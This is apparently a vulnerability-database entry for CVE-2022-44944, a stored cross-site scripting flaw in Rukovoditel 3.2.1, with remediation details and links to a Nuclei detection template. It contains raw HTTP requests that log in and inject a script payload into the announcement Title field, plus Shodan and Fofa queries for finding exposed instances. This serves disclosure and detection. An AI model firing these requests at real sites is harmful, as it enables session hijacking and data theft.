| Title | Rukovoditel <= 3.2.1 - Cross Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. |
| Remediation | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. |
| CVSS Score | 5.4 |
| EPSS Score | 0.01093 |
| CVE ID | CVE-2022-44944 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:-1499940355 |
| Fofa Query | icon_hash=-1499940355 |
| Tags | cve2022 cve rukovoditel stored-xss xss authenticated vuln |
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.
GET /index.php?module=users/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
Connection: close
Accept-Encoding: gzip
POST /index.php?module=users/login&action=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.15
Connection: close
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
form_session_token=XHF2G8&username=rnM36W&password=8Y1huN
POST /index.php?module=help_pages/pages&action=save&entities_id=24&token=XHF2G8 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15
Connection: close
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
form_session_token=XHF2G8&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44944.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-44944.pcap
N/AN/A